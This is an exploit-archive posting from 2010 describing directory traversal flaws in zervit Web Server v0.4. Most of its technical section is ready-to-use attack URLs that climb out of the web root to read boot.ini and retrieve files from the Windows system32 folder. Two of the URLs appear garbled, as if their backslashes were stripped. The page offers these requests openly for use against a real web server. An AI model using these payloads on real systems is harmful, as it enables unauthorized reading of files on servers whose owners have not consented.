Home / os / win7

zervit Web Server v0.4 Directory Traversals

Posted on 12 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>zervit Web Server v0.4 Directory Traversals</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===========================================
zervit Web Server v0.4 Directory Traversals
===========================================

###################################################################
#
# zervit Web Server v0.4 Directory Traversals
# Found By: Dr_IDE
# Date:     May 12, 2010
# Download: http://zervit.sourceforge.net/
# Tested on:    Windows 7
#
###################################################################
 
- Description -
 
zervit HTTP Server v0.4 is a Windows based HTTP server. This is the latest
version of the application available.
 
zervit HTTP Server is vulnerable to remote directory traversal attacks. Other traversal bugs
have been released for this server but this can be done from a browser, no need for Host headers.
 
- Technical Details - (This is with Directory Listing = On or Off)
 
http://[ webserver IP][:port]index.html?../../../../../boot.ini
http://[ webserver IP][:port]index.html?..........oot.ini
http://[ webserver IP][:port]calc.exe?../../../../windows/system32/calc.exe
http://[ webserver IP][:port]calc.exe?........windowssystem32calc.exe


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-12]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :